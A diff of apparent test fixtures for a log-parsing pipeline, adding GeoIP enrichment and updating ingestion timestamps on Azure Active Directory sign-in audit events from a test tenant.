@@ -2402,6 +2642,18 @@ }, { "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "ip": "67.43.156.13" }, "tags": [ @@ -2482,7 +2734,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:42:12.970173200Z", + "ingested": "2021-12-14T14:49:08.047408885Z", "original": "{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.13\",\"ApplicationId\":\"89bee1f7-5e6e-4d8a-9f3d-ecd601259da7\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.13\",\"CreationTime\":\"2020-02-12T21:38:25\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Redirect\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"False\"}],\"Id\":\"8bd0a250-74f6-4eeb-ba20-c5bdbd977013\",\"InterSystemsId\":\"4e91c3e1-819e-4ebc-ae68-2037cfc2db92\",\"IntraSystemId\":\"a063e495-5883-4837-8186-5828f9f2d500\",\"ModifiedProperties\":[],\"ObjectId\":\"Unknown\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"Unknown\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectoryStsLogon", "provider": "AzureActiveDirectory", 
@@ -2522,6 +2774,18 @@ }, { "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "ip": "67.43.156.15" }, "tags": [ 
@@ -2602,7 +2866,7 @@ "ip": "67.43.156.15" }, "event": { - "ingested": "2021-12-09T13:42:12.970178600Z", + "ingested": "2021-12-14T14:49:08.047409423Z", "original": "{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"ApplicationId\":\"08e18876-6177-487e-b8b5-cf950c1e598c\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-07T16:44:04\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Redirect\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"True\"}],\"Id\":\"a6fc9a9b-3b7e-4d33-8c0c-1d33d023e558\",\"InterSystemsId\":\"50d648cb-466d-4cf4-b2f8-3b7e84f47040\",\"IntraSystemId\":\"64613cae-510d-4a52-b486-070b775e5800\",\"ModifiedProperties\":[],\"ObjectId\":\"00000003-0000-0ff1-ce00-000000000000\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"00000003-0000-0ff1-ce00-000000000000\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectoryStsLogon", "provider": "AzureActiveDirectory", 
@@ -2642,6 +2906,18 @@ }, { "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "ip": "67.43.156.13" }, "tags": [ 
@@ -2722,7 +2998,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:42:12.970184500Z", + "ingested": "2021-12-14T14:49:08.047410027Z", "original": "{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.13\",\"ApplicationId\":\"4345a7b9-9a63-4910-a426-35363201d503\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.13\",\"CreationTime\":\"2020-02-12T10:51:45\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Success\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"False\"}],\"Id\":\"19d57a4a-d32e-4dc6-971f-3491bc440023\",\"InterSystemsId\":\"5a453031-0cc3-4577-a589-4c3bf37eed78\",\"IntraSystemId\":\"814a32f0-27fd-4e82-855c-13da15a4c300\",\"ModifiedProperties\":[],\"ObjectId\":\"00000002-0000-0000-c000-000000000000\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"00000002-0000-0000-c000-000000000000\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectoryStsLogon", "provider": "AzureActiveDirectory", 
@@ -2762,6 +3038,18 @@ }, { "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "ip": "67.43.156.15" }, "tags": [ 
@@ -2842,7 +3130,7 @@ "ip": "67.43.156.15" }, "event": { - "ingested": "2021-12-09T13:42:12.970190400Z", + "ingested": "2021-12-14T14:49:08.047410746Z", "original": "{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"ApplicationId\":\"4345a7b9-9a63-4910-a426-35363201d503\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-10T15:13:01\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Success\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"False\"}],\"Id\":\"0b158f74-e223-43c8-9cfd-5f4442f29fc7\",\"InterSystemsId\":\"5cd6215d-e206-4c3f-805d-6e386cbdab7a\",\"IntraSystemId\":\"9c218a27-ed51-4011-8383-e76850e85000\",\"ModifiedProperties\":[],\"ObjectId\":\"00000002-0000-0000-c000-000000000000\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"00000002-0000-0000-c000-000000000000\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectoryStsLogon", "provider": "AzureActiveDirectory", 
@@ -2882,6 +3170,18 @@ }, { "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "ip": "67.43.156.15" }, "tags": [ 
@@ -2962,7 +3262,7 @@ "ip": "67.43.156.15" }, "event": { - "ingested": "2021-12-09T13:42:12.970195900Z", + "ingested": "2021-12-14T14:49:08.047411386Z", "original": "{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"ApplicationId\":\"00000003-0000-0ff1-ce00-000000000000\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-07T16:43:51\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Success\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"True\"}],\"Id\":\"4819a0c2-2050-4549-ab66-f5b90cbbcc5a\",\"InterSystemsId\":\"612b339f-1088-a000-f25f-9c8af4d57894\",\"IntraSystemId\":\"c847a864-4ba2-4d8b-a9f2-5f1c1c5c5e00\",\"ModifiedProperties\":[],\"ObjectId\":\"00000003-0000-0ff1-ce00-000000000000\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"00000003-0000-0ff1-ce00-000000000000\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectoryStsLogon", "provider": "AzureActiveDirectory", 
@@ -3002,6 +3302,18 @@ }, { "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "ip": "67.43.156.13" }, "tags": [ 
@@ -3082,7 +3394,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:42:12.970201500Z", + "ingested": "2021-12-14T14:49:08.047412039Z", "original": "{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.13\",\"ApplicationId\":\"80ccca67-54bd-44ab-8625-4b79c4dc7775\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.13\",\"CreationTime\":\"2020-02-12T21:38:29\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Success\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"False\"}],\"Id\":\"e94002d9-f6e8-46f9-8702-2a29e908e73d\",\"InterSystemsId\":\"61eb5713-2687-4c00-a7b2-fde4788c395b\",\"IntraSystemId\":\"3db9a461-6dd1-4950-b3e3-fbe8c2d5c700\",\"ModifiedProperties\":[],\"ObjectId\":\"00000002-0000-0000-c000-000000000000\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"00000002-0000-0000-c000-000000000000\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectoryStsLogon", "provider": "AzureActiveDirectory", 
@@ -3122,6 +3434,18 @@ }, { "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "ip": "67.43.156.13" }, "tags": [ 
@@ -3202,7 +3526,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:42:12.970207100Z", + "ingested": "2021-12-14T14:49:08.047412588Z", "original": "{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.13\",\"ApplicationId\":\"89bee1f7-5e6e-4d8a-9f3d-ecd601259da7\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.13\",\"CreationTime\":\"2020-02-12T21:38:37\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Redirect\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"False\"}],\"Id\":\"1ca4f684-3a34-44a8-99b8-064d1071768a\",\"InterSystemsId\":\"61f81224-65fd-4c1b-b388-ee0e25485191\",\"IntraSystemId\":\"dc0cc415-9a00-470d-bda3-867e11fdd400\",\"ModifiedProperties\":[],\"ObjectId\":\"00000003-0000-0000-c000-000000000000\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"00000003-0000-0000-c000-000000000000\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectoryStsLogon", "provider": "AzureActiveDirectory", 
@@ -3242,6 +3566,18 @@ }, { "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "ip": "67.43.156.13" }, "tags": [ 
@@ -3322,7 +3658,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:42:12.970212800Z", + "ingested": "2021-12-14T14:49:08.047430883Z", "original": "{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.13\",\"ApplicationId\":\"89bee1f7-5e6e-4d8a-9f3d-ecd601259da7\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.13\",\"CreationTime\":\"2020-02-12T10:51:50\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Redirect\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"False\"}],\"Id\":\"3f6c8eb2-c64b-4dc5-b8fd-be252f8e09c2\",\"InterSystemsId\":\"661f2330-3e04-483d-9781-caaa4543cc13\",\"IntraSystemId\":\"01c15486-46e2-487a-91f5-11445da0b600\",\"ModifiedProperties\":[],\"ObjectId\":\"00000003-0000-0000-c000-000000000000\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"00000003-0000-0000-c000-000000000000\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectoryStsLogon", "provider": "AzureActiveDirectory", 
@@ -3362,6 +3698,18 @@ }, { "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "ip": "67.43.156.15" }, "tags": [ 
@@ -3442,7 +3790,7 @@ "ip": "67.43.156.15" }, "event": { - "ingested": "2021-12-09T13:42:12.970218500Z", + "ingested": "2021-12-14T14:49:08.047431512Z", "original": "{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"ApplicationId\":\"89bee1f7-5e6e-4d8a-9f3d-ecd601259da7\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-10T15:13:42\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Redirect\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"False\"}],\"Id\":\"b290b902-b6f2-49f6-b7f8-ea1541d85c8c\",\"InterSystemsId\":\"68d7eaa4-aa57-4508-9792-09e80c911aa1\",\"IntraSystemId\":\"1590b91f-bffe-4cd8-9028-de52692f5400\",\"ModifiedProperties\":[],\"ObjectId\":\"0f698dd4-f011-4d23-a33e-b36416dcb1e6\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"0f698dd4-f011-4d23-a33e-b36416dcb1e6\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectoryStsLogon", "provider": "AzureActiveDirectory", 
@@ -3482,6 +3830,18 @@ }, { "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "ip": "67.43.156.15" }, "tags": [ @@ -3561,7 +3921,7 @@ "ip": "67.43.156.15" }, "event": { - "ingested": "2021-12-09T13:42:12.970224100Z", + "ingested": "2021-12-14T14:49:08.047432094Z", "original": "{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"ApplicationId\":\"4345a7b9-9a63-4910-a426-35363201d503\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-07T16:42:59\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"RequestType\",\"Value\":\"Login:login\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Success\"}],\"Id\":\"b0c1c4a7-c6db-4f14-b628-54e37a7a6785\",\"InterSystemsId\":\"6ae96167-2df2-425c-9f91-27e6345eb782\",\"IntraSystemId\":\"f54da4fe-0a54-45f3-b6ea-39f873eb6000\",\"LogonError\":\"FlowTokenExpired\",\"ModifiedProperties\":[],\"ObjectId\":\"00000002-0000-0000-c000-000000000000\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"00000002-0000-0000-c000-000000000000\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectoryStsLogon", "provider": "AzureActiveDirectory", 
@@ -3601,6 +3961,18 @@ }, { "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "ip": "67.43.156.15" }, "tags": [ 
@@ -3682,7 +4054,7 @@ "ip": "67.43.156.15" }, "event": { - "ingested": "2021-12-09T13:42:12.970229600Z", + "ingested": "2021-12-14T14:49:08.047432666Z", "original": "{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"ApplicationId\":\"4345a7b9-9a63-4910-a426-35363201d503\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-07T16:43:02\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"FlowTokenScenario\",\"Value\":\"Login\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"1\"},{\"Name\":\"RequestType\",\"Value\":\"Login:login\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Success\"}],\"Id\":\"82d834e4-f6f2-476a-902e-e1e9fd6f87d8\",\"InterSystemsId\":\"6ae96167-2df2-425c-9f91-27e6345eb782\",\"IntraSystemId\":\"7fa5e138-ac87-4063-a278-56c6c6965e00\",\"LogonError\":\"UserStrongAuthClientAuthNRequiredInterrupt\",\"ModifiedProperties\":[],\"ObjectId\":\"00000002-0000-0000-c000-000000000000\",\"Operation\":\"UserLoginFailed\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Failed\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"00000002-0000-0000-c000-000000000000\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectoryStsLogon", "provider": "AzureActiveDirectory", 
@@ -3722,6 +4094,18 @@ }, { "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "ip": "67.43.156.13" }, "tags": [ @@ -3790,7 +4174,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:42:12.970235300Z", + "ingested": "2021-12-14T14:49:08.047433358Z", "original": "{\"Actor\":[{\"ID\":\"Unknown\",\"Type\":0}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.13\",\"ApplicationId\":\"\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.13\",\"CreationTime\":\"2020-02-12T21:38:19\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Logout\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Success\"}],\"Id\":\"e5e2c41a-55ea-4681-9d64-78ddd7145bd2\",\"InterSystemsId\":\"6b9a8662-857f-45e4-bbb2-d106d5aab41e\",\"IntraSystemId\":\"0fee3b91-5e56-45f6-9b3c-792602b1e500\",\"LogonError\":\"None\",\"ModifiedProperties\":[],\"ObjectId\":\"Unknown\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"Unknown\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"Unknown\",\"UserKey\":\"Not Available\",\"UserType\":5,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectoryStsLogon", "provider": "AzureActiveDirectory", @@ -3827,6 +4211,18 @@ }, { "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "ip": "67.43.156.15" }, "tags": [ 
